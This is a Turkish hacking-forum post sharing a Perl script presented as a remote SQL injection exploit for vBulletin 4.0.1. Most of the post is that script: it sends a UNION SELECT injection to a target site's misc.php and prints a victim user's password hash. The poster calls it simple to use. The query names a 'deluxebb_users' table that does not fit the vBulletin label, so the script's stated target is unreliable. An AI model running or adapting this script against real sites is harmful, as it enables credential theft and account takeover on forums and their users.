Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
vBulletin 4.0.1 Remote Sql İnjection Exploit
#1
Merhaba beyler.vBulletin 4.0.1 sürümlerde olan bir sql açığından yararlanılarak kodlanmış bir exploit.
Kod:
#!/usr/bin/perl

use IO::Socket;


print q{
#######################################################################
#    vBulletin Version 4.0.1 Remote SQL Injection Exploit            #
#                      By indoushka                                   #
#                     www.iq-ty.com/vb                                #
#               Souk Naamane  (00213771818860)                        #
#           Algeria Hackerz (indoushka@hotmail.com)                   #
#          Dork: Powered by vBulletin Version 4.0.1                  #            
#######################################################################
};

if (!$ARGV[2]) {

print q{
    Usage: perl  VB4.0.1.pl host /directory/ victim_userid

       perl  VB4.0.1.pl www.vb.com /forum/ 1


};

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
   print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

================================   Dz-Ghost Team   ========================================================
Greetz : ���� ����� ����� ���� ������ 22 + ��� ����� + ��� ����� + ��� ������ + ��� �������
+ ��� ������ + ��� ������ +��� ����� + ��� ���� +��� ������ + ��� ��� ������ + ��� �����
Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com  * Cyb3r IntRue (avengers team)
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net
SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com    
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org
r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net
------------------------------------------------------------------------------------------------------------

Kullanımı basit..

selametle //
[/color][/size][/font]
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 13 262 09-12-2016, Saat: 09:56
Son Yorum: anubis
  Perl ve Python Exploit Bilgisi Anlatım Part 1 Takisik 2 227 23-11-2016, Saat: 08:38
Son Yorum: KingSkrupellos
  Linux x86_64 Privilege Escalation Local Root Exploit KingSkrupellos 1 75 08-11-2016, Saat: 16:09
Son Yorum: RedLife
  İşinize Yarayacak Önemli 5 Exploit AhmetBey 0 23 07-11-2016, Saat: 23:46
Son Yorum: AhmetBey
  Asan/Suid Local Root Exploit KingSkrupellos 0 25 28-10-2016, Saat: 08:28
Son Yorum: KingSkrupellos
Anahtar Kelimeler

vBulletin 4.0.1 Remote Sql İnjection Exploit indir, vBulletin 4.0.1 Remote Sql İnjection Exploit Videosu, vBulletin 4.0.1 Remote Sql İnjection Exploit Online izle, vBulletin 4.0.1 Remote Sql İnjection Exploit Bedava indir, vBulletin 4.0.1 Remote Sql İnjection Exploit Yükle, vBulletin 4.0.1 Remote Sql İnjection Exploit Hakkında, vBulletin 4.0.1 Remote Sql İnjection Exploit Nedir, vBulletin 4.0.1 Remote Sql İnjection Exploit Free indir, vBulletin 4.0.1 Remote Sql İnjection Exploit Oyunu, vBulletin 4.0.1 Remote Sql İnjection Exploit Download


1 Ziyaretçi